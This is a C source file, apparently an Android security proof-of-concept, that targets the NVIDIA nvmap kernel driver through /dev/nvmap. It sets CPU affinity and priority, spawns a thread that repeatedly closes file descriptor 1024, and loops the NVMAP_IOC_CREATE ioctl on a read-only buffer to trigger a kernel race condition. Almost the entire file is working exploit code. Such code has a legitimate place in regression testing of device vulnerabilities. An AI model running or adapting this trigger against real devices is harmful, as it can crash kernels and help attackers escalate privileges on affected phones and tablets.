You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
177 lines
5.1 KiB
177 lines
5.1 KiB
/*
|
|
* Copyright (C) 2017 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
#define _GNU_SOURCE
|
|
#include <stdlib.h>
|
|
#include <errno.h>
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <dirent.h>
|
|
#include <string.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/ioctl.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <dlfcn.h>
|
|
#include <sys/time.h>
|
|
#include <sys/mman.h>
|
|
#include <sys/syscall.h>
|
|
#include <sys/resource.h>
|
|
#include <fcntl.h>
|
|
#include <pthread.h>
|
|
#include <unistd.h>
|
|
#include <sched.h>
|
|
|
|
#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
|
|
#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
|
|
#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
|
|
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
|
|
|
|
#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
|
|
|
|
/* allocation flags */
|
|
#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
|
|
#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
|
|
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
|
|
#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
|
|
#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
|
|
|
|
#define NVMAP_HANDLE_SECURE (0x1ul << 2)
|
|
#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
|
|
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
|
|
#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
|
|
#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
|
|
#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
|
|
|
|
struct nvmap_handle_param {
|
|
__u32 handle; /* nvmap handle */
|
|
__u32 param; /* size/align/base/heap etc. */
|
|
unsigned long result; /* returns requested info*/
|
|
};
|
|
|
|
struct nvmap_create_handle {
|
|
union {
|
|
__u32 id; /* FromId */
|
|
__u32 size; /* CreateHandle */
|
|
__s32 fd; /* DmaBufFd or FromFd */
|
|
};
|
|
__u32 handle; /* returns nvmap handle */
|
|
};
|
|
|
|
struct nvmap_alloc_handle {
|
|
__u32 handle; /* nvmap handle */
|
|
__u32 heap_mask; /* heaps to allocate from */
|
|
__u32 flags; /* wb/wc/uc/iwb etc. */
|
|
__u32 align; /* min alignment necessary */
|
|
};
|
|
|
|
#define NVMAP_IOC_MAGIC 'N'
|
|
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
|
|
#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
|
|
#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
|
|
#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
|
|
#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
|
|
#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
|
|
#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
|
|
int g_fd = -1;
|
|
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
|
|
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
|
|
struct nvmap_create_handle* g_allocation = NULL;
|
|
struct nvmap_create_handle g_allocation_dup;
|
|
|
|
int open_driver() {
|
|
char* dev_path = "/dev/nvmap";
|
|
g_fd = open(dev_path, O_RDWR);
|
|
if (g_fd < 0) {
|
|
printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
|
|
} else {
|
|
printf("[*] open file(%s) succ!\n", dev_path);
|
|
}
|
|
return g_fd;
|
|
}
|
|
|
|
void trigger_nvmap_create() {
|
|
ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
|
|
}
|
|
|
|
void trigger_nvmap_create_dup(int fd) {
|
|
g_allocation_dup.fd = fd;
|
|
ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
|
|
}
|
|
|
|
void trigger_nvmap_alloc() {
|
|
struct nvmap_alloc_handle alloc = {0};
|
|
alloc.align = 0x1000;
|
|
alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
|
|
alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
|
|
alloc.handle = g_allocation->handle;
|
|
ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
|
|
}
|
|
|
|
void trigger_nvmap_free(int fd) {
|
|
ioctl(g_fd, NVMAP_IOC_FREE, fd);
|
|
}
|
|
|
|
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
|
|
setpriority(PRIO_PROCESS, gettid(), privi);
|
|
|
|
/* bind process to a CPU*/
|
|
if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
|
|
}
|
|
}
|
|
|
|
void prepare_data() {
|
|
void* data = (void *) memalign(0x1000, 4 * 0x1000);
|
|
//void* data = malloc(0x10000);
|
|
printf("[*] data = %p\n", data);
|
|
g_allocation = (struct nvmap_create_handle*)data;
|
|
g_allocation->size = 1024;
|
|
g_allocation->handle = -1;
|
|
mprotect(data, 0x1000, PROT_READ);
|
|
printf("[*] mprotect, error = %d\n", errno);
|
|
}
|
|
|
|
void* race_thread(void* arg) {
|
|
setup_privi_and_affinity(-10, 2);
|
|
|
|
pthread_mutex_lock(&mutex);
|
|
pthread_cond_wait(&cond, &mutex);
|
|
pthread_mutex_unlock(&mutex);
|
|
|
|
while (1)
|
|
close(1024);
|
|
}
|
|
|
|
int main(int argc, char**argv) {
|
|
|
|
setup_privi_and_affinity(-10, 1);
|
|
|
|
if (open_driver() < 0) {
|
|
return -1;
|
|
}
|
|
prepare_data();
|
|
|
|
pthread_t tid;
|
|
pthread_create(&tid, NULL, race_thread, NULL);
|
|
usleep(100 * 1000);
|
|
|
|
pthread_cond_signal(&cond);
|
|
usleep(20);
|
|
while (1) {
|
|
trigger_nvmap_create();
|
|
}
|
|
return 0;
|
|
}
|